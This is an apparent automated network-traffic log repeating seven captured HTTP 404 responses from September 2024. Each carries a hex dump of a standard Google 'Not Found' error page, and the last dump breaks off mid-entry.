Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 